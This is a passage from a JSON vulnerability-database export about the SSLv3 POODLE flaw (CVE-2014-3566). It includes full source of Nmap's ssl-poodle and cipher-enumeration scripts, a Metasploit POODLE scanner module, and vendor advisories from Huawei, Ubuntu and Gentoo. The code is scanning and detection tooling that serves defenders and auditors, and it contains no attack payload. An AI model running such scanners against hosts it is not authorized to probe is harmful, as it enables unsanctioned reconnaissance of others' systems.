\"server\" then\n local sorted, err = sort_ciphers(host, port, protocol, ciphers)\n if sorted then\n ciphers = sorted\n else\n -- Can't sort, fall back to alphabetical order\n table.sort(ciphers)\n cipher_pref_err = err\n end\n else\n -- fall back to alphabetical order\n table.sort(ciphers)\n end\n\n -- Add rankings to ciphers\n for i, name in ipairs(ciphers) do\n local outcipher = {name=name, kex_info=scores[name].extra, strength=scores[name].letter_grade}\n setmetatable(outcipher,{\n __tostring=function(t)\n if t.kex_info then\n return string.format(\"%s (%s) - %s\", t.name, t.kex_info, t.strength)\n else\n return string.format(\"%s - %s\", t.name, t.strength)\n end\n end\n })\n ciphers[i]=outcipher\n end\n\n results[\"ciphers\"] = ciphers\n\n -- Format the compressor table.\n if compressors then\n table.sort(compressors)\n end\n results[\"compressors\"] = compressors\n\n results[\"cipher preference\"] = cipher_pref\n results[\"cipher preference error\"] = cipher_pref_err\n if next(scores.warnings) then\n results[\"warnings\"] = sorted_keys(scores.warnings)\n end\n\n upresults[protocol] = results\n condvar \"signal\"\n return nil\nend\n\nportrule = function (host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\n--- Return a table that yields elements sorted by key when iterated over with pairs()\n-- Should probably put this in a formatting library later.\n-- Depends on keys() function defined above.\n--@param t The table whose data should be used\n--@return out A table that can be passed to pairs() to get sorted results\nfunction sorted_by_key(t)\n local out = {}\n setmetatable(out, {\n __pairs = function(_)\n local order = sorted_keys(t)\n return coroutine.wrap(function()\n for i,k in ipairs(order) do\n coroutine.yield(k, t[k])\n end\n end)\n end\n })\n return out\nend\n\naction = function(host, port)\n\n if not have_ssl then\n stdnse.verbose(\"OpenSSL not available; some cipher scores will be marked as unknown.\")\n end\n\n local results = {}\n\n local condvar = nmap.condvar(results)\n local threads = {}\n\n for name, _ in pairs(tls.PROTOCOLS) do\n stdnse.debug1(\"Trying protocol %s.\", name)\n local co = stdnse.new_thread(try_protocol, host, port, name, results)\n threads[co] = true\n end\n\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then threads[thread] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n if not next(results) then\n return nil\n end\n\n local least = \"A\"\n for p, r in pairs(results) do\n for i, c in ipairs(r.ciphers) do\n -- counter-intuitive: \"A\" < \"B\", so really looking for max\n least = least < c.strength and c.strength or least\n end\n end\n results[\"least strength\"] = least\n\n return sorted_by_key(results)\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "nmap": {"scriptType": "portrule", "categories": ["discovery", "intrusive"]}}, {"lastseen": "2018-10-18T16:33:28", "references": [], "description": "Checks whether SSLv3 CBC ciphers are allowed (POODLE) \n\nRun with -sV to use Nmap's service scan to detect SSL/TLS on non-standard ports. Otherwise, ssl-poodle will only run on ports that are commonly used for SSL. \n\nPOODLE is CVE-2014-3566. All implementations of SSLv3 that accept CBC ciphersuites are vulnerable. For speed of detection, this script will stop after the first CBC ciphersuite is discovered. If you want to enumerate all CBC ciphersuites, you can use Nmap's own ssl-enum-ciphers to do a full audit of your TLS ciphersuites.\n\n## Script Arguments \n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --version-light --script ssl-poodle -p 443 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | ssl-poodle:\n | VULNERABLE:\n | SSL POODLE information leak\n | State: VULNERABLE\n | IDs: CVE:CVE-2014-3566 OSVDB:113251\n | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n | other products, uses nondeterministic CBC padding, which makes it easier\n | for man-in-the-middle attackers to obtain cleartext data via a\n | padding-oracle attack, aka the \"POODLE\" issue.\n | Disclosure date: 2014-10-14\n | Check results:\n | TLS_RSA_WITH_3DES_EDE_CBC_SHA\n | References:\n | https://www.imperialviolet.org/2014/10/14/poodle.html\n | http://osvdb.org/113251\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n |_ https://www.openssl.org/~bodo/ssl-poodle.pdf\n \n\n## Requires \n\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * table\n * tableaux\n * tls\n * listop\n * vulns\n\n* * *\n", "edition": 9, "reporter": "Daniel Miller", "published": "2014-10-21T14:08:34", "title": "ssl-poodle NSE Script", "type": "nmap", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-10-17T15:34:30", "id": "NMAP:SSL-POODLE.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-poodle.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal sslcert = require \"sslcert\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\nlocal tls = require \"tls\"\nlocal listop = require \"listop\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nChecks whether SSLv3 CBC ciphers are allowed (POODLE)\n\nRun with -sV to use Nmap's service scan to detect SSL/TLS on non-standard\nports. Otherwise, ssl-poodle will only run on ports that are commonly used for\nSSL.\n\nPOODLE is CVE-2014-3566. All implementations of SSLv3 that accept CBC\nciphersuites are vulnerable. For speed of detection, this script will stop\nafter the first CBC ciphersuite is discovered. If you want to enumerate all CBC\nciphersuites, you can use Nmap's own ssl-enum-ciphers to do a full audit of\nyour TLS ciphersuites.\n]]\n\n---\n-- @usage\n-- nmap -sV --version-light --script ssl-poodle -p 443 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | ssl-poodle:\n-- | VULNERABLE:\n-- | SSL POODLE information leak\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2014-3566 OSVDB:113251\n-- | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n-- | other products, uses nondeterministic CBC padding, which makes it easier\n-- | for man-in-the-middle attackers to obtain cleartext data via a\n-- | padding-oracle attack, aka the \"POODLE\" issue.\n-- | Disclosure date: 2014-10-14\n-- | Check results:\n-- | TLS_RSA_WITH_3DES_EDE_CBC_SHA\n-- | References:\n-- | https://www.imperialviolet.org/2014/10/14/poodle.html\n-- | http://osvdb.org/113251\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n-- |_ https://www.openssl.org/~bodo/ssl-poodle.pdf\n--\n\nauthor = \"Daniel Miller\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"vuln\", \"safe\"}\n\ndependencies = {\"ssl-enum-ciphers\", \"https-redirect\"}\n\n-- Test this many ciphersuites at a time.\n-- http://seclists.org/nmap-dev/2012/q3/156\n-- http://seclists.org/nmap-dev/2010/q1/859\nlocal CHUNK_SIZE = 64\n\n-- Add additional context (protocol) to debug output\nlocal function ctx_log(level, protocol, fmt, ...)\n return stdnse.print_debug(level, \"(%s) \" .. fmt, protocol, ...)\nend\n\nlocal function try_params(host, port, t)\n local timeout = ((host.times and host.times.timeout) or 5) * 1000 + 5000\n\n -- Create socket.\n local status, sock, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, sock = specialized(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", sock)\n return nil\n end\n else\n sock = nmap.new_socket()\n sock:set_timeout(timeout)\n status, err = sock:connect(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", err)\n sock:close()\n return nil\n end\n end\n\n sock:set_timeout(timeout)\n\n -- Send request.\n local req = tls.client_hello(t)\n status, err = sock:send(req)\n if not status then\n ctx_log(1, t.protocol, \"Can't send: %s\", err)\n sock:close()\n return nil\n end\n\n -- Read response.\n local buffer = \"\"\n local i = 1\n while true do\n status, buffer, err = tls.record_buffer(sock, buffer, i)\n if not status then\n ctx_log(1, t.protocol, \"Couldn't read a TLS record: %s\", err)\n return nil\n end\n -- Parse response.\n local record\n i, record = tls.record_read(buffer, i)\n if record and record.type == \"alert\" and record.body[1].level == \"warning\" then\n ctx_log(1, t.protocol, \"Ignoring warning: %s\", record.body[1].description)\n -- Try again.\n elseif record then\n sock:close()\n return record\n end\n end\nend\n\nlocal function sorted_keys(t)\n local ret = {}\n for k, _ in pairs(t) do\n ret[#ret+1] = k\n end\n table.sort(ret)\n return ret\nend\n\nlocal function in_chunks(t, size)\n local ret = {}\n for i = 1, #t, size do\n local chunk = {}\n for j = i, i + size - 1 do\n chunk[#chunk+1] = t[j]\n end\n ret[#ret+1] = chunk\n end\n return ret\nend\n\nlocal function remove(t, e)\n for i, v in ipairs(t) do\n if v == e then\n table.remove(t, i)\n return i\n end\n end\n return nil\nend\n\n-- https://bugzilla.mozilla.org/show_bug.cgi?id=946147\nlocal function remove_high_byte_ciphers(t)\n local output = {}\n for i, v in ipairs(t) do\n if tls.CIPHERS[v] <= 255 then\n output[#output+1] = v\n end\n end\n return output\nend\n\nlocal function base_extensions(host)\n local tlsname = tls.servername(host)\n return {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n -- Enable SNI if a server name is available\n [\"server_name\"] = tlsname and tls.EXTENSION_HELPERS[\"server_name\"](tlsname),\n }\nend\n\n-- Find which ciphers out of group are supported by the server.\nlocal function find_ciphers_group(host, port, protocol, group)\n local name, protocol_worked, record, results\n results = {}\n local t = {\n [\"protocol\"] = protocol,\n [\"extensions\"] = base_extensions(host),\n }\n\n -- This is a hacky sort of tristate variable. There are three conditions:\n -- 1. false = either ciphers or protocol is bad. Keep trying with new ciphers\n -- 2. nil = The protocol is bad. Abandon thread.\n -- 3. true = Protocol works, at least some cipher must be supported.\n protocol_worked = false\n while (next(group)) do\n t[\"ciphers\"] = group\n\n record = try_params(host, port, t)\n\n if record == nil then\n if protocol_worked then\n ctx_log(2, protocol, \"%d ciphers rejected. (No handshake)\", #group)\n else\n ctx_log(1, protocol, \"%d ciphers and/or protocol rejected. (No handshake)\", #group)\n end\n break\n elseif record[\"protocol\"] ~= protocol or record[\"body\"][1][\"protocol\"] and record.body[1].protocol ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected.\")\n protocol_worked = nil\n break\n elseif record[\"type\"] == \"alert\" and record[\"body\"][1][\"description\"] == \"handshake_failure\" then\n protocol_worked = true\n ctx_log(2, protocol, \"%d ciphers rejected.\", #group)\n break\n elseif record[\"type\"] ~= \"handshake\" or record[\"body\"][1][\"type\"] ~= \"server_hello\" then\n ctx_log(2, protocol, \"Unexpected record received.\")\n break\n else\n protocol_worked = true\n name = record[\"body\"][1][\"cipher\"]\n ctx_log(1, protocol, \"Cipher %s chosen.\", name)\n if not remove(group, name) then\n ctx_log(1, protocol, \"chose cipher %s that was not offered.\", name)\n ctx_log(1, protocol, \"removing high-byte ciphers and trying again.\")\n local size_before = #group\n group = remove_high_byte_ciphers(group)\n ctx_log(1, protocol, \"removed %d high-byte ciphers.\", size_before - #group)\n if #group == size_before then\n -- No changes... Server just doesn't like our offered ciphers.\n break\n end\n else\n -- Add cipher to the list of accepted ciphers.\n table.insert(results, name)\n -- POODLE check doesn't care about the rest of the ciphers\n break\n end\n end\n end\n return results, protocol_worked\nend\n\n-- POODLE only affects CBC ciphers\nlocal cbc_ciphers = listop.filter(\n function(x) return string.find(x, \"_CBC_\",1,true) end,\n sorted_keys(tls.CIPHERS)\n )\n-- move these to the top, more likely to be supported\nfor _, c in ipairs({\n \"TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\", --mandatory for TLSv1.0\n \"TLS_RSA_WITH_3DES_EDE_CBC_SHA\", -- mandatory for TLSv1.1\n \"TLS_RSA_WITH_AES_128_CBC_SHA\", -- mandatory fro TLSv1.2\n }) do\n remove(cbc_ciphers, c)\n table.insert(cbc_ciphers, 1, c)\nend\n\n-- Break the cipher list into chunks of CHUNK_SIZE (for servers that can't\n-- handle many client ciphers at once), and then call find_ciphers_group on\n-- each chunk.\nlocal function find_ciphers(host, port, protocol)\n local name, protocol_worked, results, chunk\n local ciphers = in_chunks(cbc_ciphers, CHUNK_SIZE)\n\n results = {}\n\n -- Try every cipher.\n for _, group in ipairs(ciphers) do\n chunk, protocol_worked = find_ciphers_group(host, port, protocol, group)\n if protocol_worked == nil then return nil end\n for _, name in ipairs(chunk) do\n table.insert(results, name)\n end\n -- Another POODLE shortcut\n if protocol_worked and next(results) then return results end\n end\n return results\nend\n\n-- check if draft-ietf-tls-downgrade-scsv-00 is implemented as a mitigation\nlocal function check_fallback_scsv(host, port, protocol, ciphers)\n local results = {}\n local t = {\n [\"protocol\"] = protocol,\n [\"extensions\"] = base_extensions(host),\n }\n\n t[\"ciphers\"] = tableaux.tcopy(ciphers)\n t.ciphers[#t.ciphers+1] = \"TLS_FALLBACK_SCSV\"\n\n -- TODO: remove this check after the next release.\n -- Users are using this script without the necessary tls.lua changes\n if not tls.TLS_ALERT_REGISTRY[\"inappropriate_fallback\"] then\n -- This could get dangerous if mixed with ssl-enum-ciphers\n -- so we make this script dependent on ssl-enum-ciphers and hope for the best.\n tls.CIPHERS[\"TLS_FALLBACK_SCSV\"] = 0x5600\n tls.TLS_ALERT_REGISTRY[\"inappropriate_fallback\"] = 86\n end\n\n local record = try_params(host, port, t)\n\n -- cleanup (also remove after next release)\n tls.CIPHERS[\"TLS_FALLBACK_SCSV\"] = nil\n\n if record and record[\"type\"] == \"alert\" and record[\"body\"][1][\"description\"] == \"inappropriate_fallback\" then\n ctx_log(2, protocol, \"TLS_FALLBACK_SCSV rejected properly.\")\n return true\n end\n return false\nend\n\nportrule = function (host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"SSL POODLE information leak\",\n description = [[\n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the \"POODLE\" issue.]],\n state = vulns.STATE.NOT_VULN,\n IDS = {\n CVE = 'CVE-2014-3566',\n OSVDB = '113251'\n },\n SCORES = {\n CVSSv2 = '4.3'\n },\n dates = {\n disclosure = {\n year = 2014, month = 10, day = 14\n }\n },\n references = {\n \"https://www.openssl.org/~bodo/ssl-poodle.pdf\",\n \"https://www.imperialviolet.org/2014/10/14/poodle.html\"\n }\n }\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n local ciphers = find_ciphers(host, port, 'SSLv3')\n if ciphers == nil then\n vuln_table.check_results = { \"SSLv3 not supported\" }\n elseif #ciphers == 0 then\n vuln_table.check_results = { \"No CBC ciphersuites found\" }\n else\n vuln_table.check_results = ciphers\n if check_fallback_scsv(host, port, 'SSLv3', ciphers) then\n table.insert(vuln_table.check_results, \"TLS_FALLBACK_SCSV properly implemented\")\n vuln_table.state = vulns.STATE.LIKELY_VULN\n else\n vuln_table.state = vulns.STATE.VULN\n end\n end\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "nmap": {"scriptType": "portrule", "categories": ["safe", "vuln"]}}], "huawei": [{"lastseen": "2016-09-05T13:35:31", "references": [], "edition": 1, "description": "The SSLv3 protocol supported by some Huawei products has the so-called Padding Oracle On Downgraded Legacy Encryption (POODLE) vulnerability. The attacker can launch a man-in-the-middle attack to manipulate the TLS negotiation process so that the communication parties use SSLv3, which has information disclosure vulnerability (vulnerability ID: HWPSIRT-2014-1041).\n\nThis Vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2014-3566.", "reporter": "Huawei Technologies", "published": "2014-12-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "huawei", "title": "Security Advisory-SSLv3 POODLE Vulnerability in Huawei Products", "bulletinFamily": "software", "affectedSoftware": [{"name": "S6300", "version": "V200R003C00", "operator": "eq"}, {"name": "CH220", "version": "V100R001C00", "operator": "eq"}, {"name": "S5300", "version": "V200R006C00", "operator": "eq"}, {"name": "9300E", "version": "V200R006C00", "operator": "eq"}, {"name": "eSpace Agent Desktop", "version": "V200R001C03", "operator": "eq"}, {"name": "S6700", "version": "V200R005C00", "operator": "eq"}, {"name": "S6300", "version": "V200R005C00", "operator": "eq"}, {"name": "9300E", "version": "V200R003C00", "operator": "eq"}, {"name": "RH2288 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "S5700", "version": "V200R005C00", "operator": "eq"}, {"name": "E9000 Chassis", "version": "V100R001C00", "operator": "eq"}, {"name": "S9300", "version": "V200R005C00", "operator": "eq"}, {"name": "AC6605", "version": "V200R001C00\n V200R002C00\n V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "BH620 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "CH121", "version": "V100R001C00", "operator": "eq"}, {"name": "eSight Network", "version": "V200R003C10", "operator": "eq"}, {"name": "AP6610DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "9700", "version": "V200R003C00", "operator": "eq"}, {"name": "S6700", "version": "V200R003C00", "operator": "eq"}, {"name": "7700", "version": "V200R001C00", "operator": "eq"}, {"name": "S2300", "version": "V100R006C00", "operator": "eq"}, {"name": "S9300", "version": "V200R001C00", "operator": "eq"}, {"name": "S5300", "version": "V200R003C00", "operator": "eq"}, {"name": "RH5885 V3", "version": "V100R003C00/ C01", "operator": "eq"}, {"name": "CH242", "version": "V100R001C00", "operator": "eq"}, {"name": "OceanStor ReplicationDirector", "version": "V100R003C00", "operator": "eq"}, {"name": "S3700", "version": "V100R006C03", "operator": "eq"}, {"name": "AR3200", "version": "V200R005C32", "operator": "eq"}, {"name": "E6000 Chassis", "version": "V100R001C00", "operator": "eq"}, {"name": "9700", "version": "V100R006C00", "operator": "eq"}, {"name": "AP7110DN-AGN-FAT", "version": "V200R005C00", "operator": "eq"}, {"name": "S3300", "version": "V100R006C05", "operator": "eq"}, {"name": "S2300", "version": "V100R006C05", "operator": "eq"}, {"name": "7700", "version": "V200R006C00", "operator": "eq"}, {"name": "AP6510DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "S3300", "version": "V100R006C00", "operator": "eq"}, {"name": "CH242V3", "version": "V100R001C00", "operator": "eq"}, {"name": "AP6010DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "AC6005", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "S5300", "version": "V200R005C00", "operator": "eq"}, {"name": "BH622 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "9300E", "version": "V200R005C00", "operator": "eq"}, {"name": "eSight UC&C", "version": "V100R002C00", "operator": "eq"}, {"name": "AP5130DN-FAT", "version": "V200R005C00", "operator": "eq"}, {"name": "ManageOne", "version": "V100R002C00/ C10/ C20", "operator": "eq"}, {"name": "CH140", "version": "V100R001C00", "operator": "eq"}, {"name": "S2700", "version": "V100R006C03", "operator": "eq"}, {"name": "S5700", "version": "V200R003C00", "operator": "eq"}, {"name": "9700", "version": "V200R001C00", "operator": "eq"}, {"name": "S2700", "version": "V100R006C05", "operator": "eq"}, {"name": "eSight Network", "version": "V200R005C00", "operator": "eq"}, {"name": "AP5010SN-GN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "9300E", "version": "V100R006C00", "operator": "eq"}, {"name": "eSpace U2980", "version": "V100R001C01\n V100R001C02SPC200", "operator": "eq"}, {"name": "AR3200", "version": "V200R005C30", "operator": "eq"}, {"name": "ACU2", "version": "V200R005C00", "operator": "eq"}, {"name": "7700", "version": "V200R003C00", "operator": "eq"}, {"name": "CH240", "version": "V100R001C00", "operator": "eq"}, {"name": "eSpace USM", "version": "V100R001 C10", "operator": "eq"}, {"name": "AP5030DN-FAT", "version": "V200R005C00", "operator": "eq"}, {"name": "AP6010SN-GN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "eSight UC&C", "version": "V100R001C20", "operator": "eq"}, {"name": "S5300", "version": "V200R001C00", "operator": "eq"}, {"name": "S9300", "version": "V100R006C00", "operator": "eq"}, {"name": "eSight UC&C", "version": "V100R001C01", "operator": "eq"}, {"name": "7700", "version": "V200R005C00", "operator": "eq"}, {"name": "OceanStor ReplicationDirector", "version": "V100R002C10", "operator": "eq"}, {"name": "9700", "version": "V200R005C00", "operator": "eq"}, {"name": "S9300", "version": "V200R006C00", "operator": "eq"}, {"name": "9700", "version": "V200R006C00", "operator": "eq"}, {"name": "S2700", "version": "V100R006C00", "operator": "eq"}, {"name": "S6700", "version": "V200R001C00", "operator": "eq"}, {"name": "CH221", "version": "V100R001C00", "operator": "eq"}, {"name": "S5700", "version": "V200R001C00", "operator": "eq"}, {"name": "S5700", "version": "V200R006C00", "operator": "eq"}, {"name": "S2300", "version": "V100R006C03", "operator": "eq"}, {"name": "S3300", "version": "V100R006C03", "operator": "eq"}, {"name": "S12700", "version": "V200R005C00", "operator": "eq"}, {"name": "S3700", "version": "V100R006C05", "operator": "eq"}, {"name": "S9300", "version": "V200R003C00", "operator": "eq"}, {"name": "eSpace ECS", "version": "V200R002C00", "operator": "eq"}, {"name": "S6300", "version": "V200R001C00", "operator": "eq"}, {"name": "AP3010DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "9300E", "version": "V200R001C00", "operator": "eq"}, {"name": "AP5010DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "7700", "version": "V100R006C00", "operator": "eq"}, {"name": "CH222", "version": "V100R002C00", "operator": "eq"}, {"name": "ManageOne SC", "version": "V100R002C20", "operator": "eq"}, {"name": "S12700", "version": "V200R006C00", "operator": "eq"}, {"name": "S3700", "version": "V100R006C00", "operator": "eq"}, {"name": "eSpace USM", "version": "V100R001C01", "operator": "eq"}], "cvelist": ["CVE-2014-3566"], "modified": "2015-05-05T00:00:00", "id": "HUAWEI-SA-20141215-01-POODLE", "href": "http://www.huawei.com/en/psirt/security-advisories/2015/hw-405500", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "metasploit": [{"lastseen": "2018-09-02T03:42:41", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "Check if an HTTP server supports a given version of SSL/TLS. If a web server can successfully establish an SSLv3 session, it is likely to be vulnerable to the POODLE attack described on October 14, 2014, as a patch against the attack is unlikely.", "reporter": "Rapid7", "published": "2014-10-17T16:25:14", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/http/ssl_version.rb", "type": "metasploit", "title": "HTTP SSL/TLS Version Detection (POODLE scanner)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/HTTP/SSL_VERSION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/http'\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'HTTP SSL/TLS Version Detection (POODLE scanner)',\n 'Description' => %q{\n Check if an HTTP server supports a given version of SSL/TLS.\n\n If a web server can successfully establish an SSLv3 session, it is\n likely to be vulnerable to the POODLE attack described on\n October 14, 2014, as a patch against the attack is unlikely.\n },\n 'Author' => 'todb',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 443,\n },\n 'References' =>\n [\n [ 'URL', 'http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html'],\n [ 'OSVDB', '113251'],\n [ 'CVE', '2014-3566']\n ],\n 'DisclosureDate' => 'Oct 14 2014'\n )\n\n register_options(\n [\n Opt::SSLVersion\n ]\n )\n\n end\n\n # Fingerprint a single host\n def run_host(ip)\n begin\n res = send_request_raw({ 'uri' => '/', 'method' => 'GET' })\n fp = http_fingerprint(:response => res)\n if fp\n vprint_status(\"#{peer} connected and fingerprinted: #{fp}\")\n # TODO: Interrogate the connection itself to see what version\n # was used. Where that actually lives is eluding me. :/\n if datastore['SSL'] && datastore['SSLVersion'] == 'SSL3'\n print_good(\"#{peer} accepts SSLv3\")\n report_poodle_vuln(ip)\n end\n end\n rescue ::OpenSSL::SSL::SSLError => e\n ssl_version = e.message.match(/ state=([^\\s]+)/)[1]\n vprint_status(\"#{peer} does not accept #{ssl_version}\")\n end\n end\n\n def report_poodle_vuln(ip)\n report_vuln(\n :host => ip,\n :port => rport,\n :proto => 'tcp',\n :name => self.name,\n :info => \"Module #{self.fullname} confirmed SSLv3 is available\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n )\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/ssl_version.rb"}], "ubuntu": [{"lastseen": "2018-08-31T00:09:30", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3513", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3567"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "0.9.8k-7ubuntu8.22", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libssl0.9.8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "1.0.1-4ubuntu5.20", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libssl1.0.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1.0.1f-1ubuntu2.7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libssl1.0.0", "operator": "lt"}], "description": "It was discovered that OpenSSL incorrectly handled memory when parsing DTLS SRTP extension data. A remote attacker could possibly use this issue to cause OpenSSL to consume resources, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3513)\n\nIt was discovered that OpenSSL incorrectly handled memory when verifying the integrity of a session ticket. A remote attacker could possibly use this issue to cause OpenSSL to consume resources, resulting in a denial of service. (CVE-2014-3567)\n\nIn addition, this update introduces support for the TLS Fallback Signaling Cipher Suite Value (TLS_FALLBACK_SCSV). This new feature prevents protocol downgrade attacks when certain applications such as web browsers attempt to reconnect using a lower protocol version for interoperability reasons.", "edition": 3, "reporter": "Ubuntu", "published": "2014-10-16T00:00:00", "title": "OpenSSL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3513", "CVE-2014-3567"], "modified": "2014-10-16T00:00:00", "id": "USN-2385-1", "href": "https://usn.ubuntu.com/2385-1/", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:18", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=526208", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3566", "https://bugs.gentoo.org/show_bug.cgi?id=523216", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6610"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "11.13.1", "packageName": "net-misc/asterisk", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nAsterisk is an open source telephony engine and toolkit.\n\n### Description\n\nMultiple unspecified vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could exploit the vulnerabilities to cause a man in the middle attack or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Asterisk users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-11.13.1\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2014-11-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Asterisk: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-6610"], "modified": "2014-11-23T00:00:00", "id": "GLSA-201411-10", "href": "https://security.gentoo.org/glsa/201411-10", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:04", "references": [], "edition": 